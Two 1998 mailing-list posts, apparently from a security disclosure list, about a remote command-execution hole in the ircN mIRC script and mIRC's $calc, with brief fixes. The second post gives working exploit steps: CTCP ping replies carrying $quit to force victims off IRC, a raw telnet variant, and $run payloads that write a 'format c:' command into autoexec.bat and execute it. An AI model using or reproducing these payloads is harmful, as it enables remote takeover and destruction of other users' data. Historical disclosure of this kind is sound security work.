ircn.txt

`  
Date: Thu, 23 Jul 1998 22:57:46 +0000  
From: Benoit Lefebvre <[email protected]>  
Subject: Re: Backdoor in ircN, popular mIRC script.  
  
The bug is not only in ircN  
It is in mIRC.  
  
The problem is $calc(..)  
ircN is just one of the script who use $calc to check the ping delay  
eg: on 1:CTCPREPLY:PING*: { echo -a Ping reply: $calc($ctime - $2) }  
  
To protect yourself, add that to your script  
on 1:CTCPREPLY:PING*: { if ($2 !isnum) { halt } }  
  
--  
  
From [email protected] Thu Jul 23 09:12:15 1998  
Date: Wed, 22 Jul 1998 23:02:37 -0400  
From: Tom <[email protected]>  
Subject: Ircn Exploit..  
  
While looking around at IRCN (irc client).. I noticed a hole in the code  
which allowed people to run programs, make the ircn user quit off irc, etc..  
There isn't really much to say about it.. Here is how you do it..  
  
How to exploit bug:  
  
In a windows irc client type:  
/ctcpreply (nickname) ping $quit(i,am,owned)  
Result:  
*** ^DaWg^ ([email protected]) Quit (owned by nofear)  
  
For you unix users telnet to the irc server on port 6667 and type  
user bleh bleh bleh bleh bleh  
nick asdfksdjflk (this will be your nick.. Get creative)  
then type:  
notice (nick) (press ctrl + a) ping $quit(i,am,owned)(press ctrl + a)  
and bam!@#  
  
How to fix bug:  
in your ircn client type /events off  
  
There are a lot of nice little things you can do with this bug... here are a  
few..  
  
/ctcpreturn (nick) $run(echo,"echo,y,|,format,c:\",>,c:\autoexec.bat)  
/ctcpreturn (nick) $run(c:\autoexec.bat)  
  
  
-NoFear  
`